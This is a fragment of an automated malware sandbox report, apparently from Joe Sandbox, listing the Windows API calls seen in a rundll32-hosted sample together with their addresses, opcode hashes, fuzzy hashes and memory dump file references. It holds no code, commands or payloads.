                                                                                                          • Instruction ID: e47a27f64338b3e84d430cb899d867ed3d67d72a97b2c0655aeaec8263a425f7
                                                                                                          • Opcode Fuzzy Hash: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
                                                                                                          • Instruction Fuzzy Hash: 8841B77461410AAFEB48CF58C490BA9B7B2FB88364F14C659EC1A9F355C731EE41CB84
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • RtlAllocateHeap.NTDLL(040306B1,?,ED94606E,?,?,?,?,?,?,?,?,?,?,?), ref: 03516543
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.718929777.0000000003501000.00000020.00000001.sdmp, Offset: 03500000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.718924842.0000000003500000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000006.00000002.718948522.0000000003526000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_3500000_rundll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
                                                                                                          • Instruction ID: 54be128f5cf1d8f9bb3870fe49be4acb200fe47ce9153b66dec23d149431b498
                                                                                                          • Opcode Fuzzy Hash: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
                                                                                                          • Instruction Fuzzy Hash: 3D1103B6C0121DFBDF05DFA5D9098CEBBB4FB40314F108598E811A6260E3B59B249F91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,27C97096,?,?,?,?,?,?,?,?,?,?,?), ref: 0351E94E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.718929777.0000000003501000.00000020.00000001.sdmp, Offset: 03500000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.718924842.0000000003500000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000006.00000002.718948522.0000000003526000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_3500000_rundll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: ManagerOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1889721586-0
                                                                                                          • Opcode ID: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
                                                                                                          • Instruction ID: 53221378b6a34d7b69e75f894a2383f202e54e3ff525455241ca3c560be7a7fb
                                                                                                          • Opcode Fuzzy Hash: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
                                                                                                          • Instruction Fuzzy Hash: 9811277190221DFB9B04EFE89D468DFBFB4FF44304F108588E825B6221D3B18B149B91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 0351D1B6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.718929777.0000000003501000.00000020.00000001.sdmp, Offset: 03500000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.718924842.0000000003500000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000006.00000002.718948522.0000000003526000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_3500000_rundll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: ExitProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 621844428-0
                                                                                                          • Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                                                                                                          • Instruction ID: 4a5d683ba1ee788291f77961a25104c37492817b1b66401c676e44c48e6270d2
                                                                                                          • Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                                                                                                          • Instruction Fuzzy Hash: BA1100B1C4030DEBDB44DFE5D94A69EBBB0EB00708F108588D521B6250D3B89A489F90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • VirtualAlloc.KERNEL32(?,00000000,00001000,00000004), ref: 100025CC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.719414263.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.719409694.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: d2bbee85c6cabd151e34b26d14f83d277689191624d3873c1df0f1bcce928bde
                                                                                                          • Instruction ID: f227e8c1e280d8d0b8d11f9a2f1445d4c625449e48c39147985fdcb30a9e5b67
                                                                                                          • Opcode Fuzzy Hash: d2bbee85c6cabd151e34b26d14f83d277689191624d3873c1df0f1bcce928bde
                                                                                                          • Instruction Fuzzy Hash: FE51E9B4A0010AEFDB04CF94C990AAEB7F1FF48345F248598E905AB345D370EE91CBA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • lstrcmpiW.KERNEL32(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 035206E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.718929777.0000000003501000.00000020.00000001.sdmp, Offset: 03500000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.718924842.0000000003500000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000006.00000002.718948522.0000000003526000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_3500000_rundll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: lstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 1586166983-0
                                                                                                          • Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                          • Instruction ID: e85e2444c05a719de3baa56d85dcb9b0ed7d7f1e202ac1b8cae9b10da526f2a2
                                                                                                          • Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                          • Instruction Fuzzy Hash: DC2113B5C0130AABCF14DFA9D9499DEBFB5FB10354F108298E529A6261D3B58B04CF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Non-executed Functions